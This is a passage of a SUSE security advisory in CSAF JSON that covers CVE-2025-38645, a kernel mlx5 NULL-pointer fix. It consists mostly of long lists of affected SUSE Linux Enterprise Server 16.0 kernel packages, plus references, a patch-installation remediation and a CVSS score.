"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38590"
},
{
"cve": "CVE-2025-38645",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38645"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Check device memory pointer before usage\n\nAdd a NULL check before accessing device memory to prevent a crash if\ndev-\u003edm allocation in mlx5_init_once() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38645",
"url": "https://www.suse.com/security/cve/CVE-2025-38645"
},
{
"category": "external",
"summary": "SUSE Bug 1248626 for CVE-2025-38645",
"url": "https://bugzilla.suse.com/1248626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
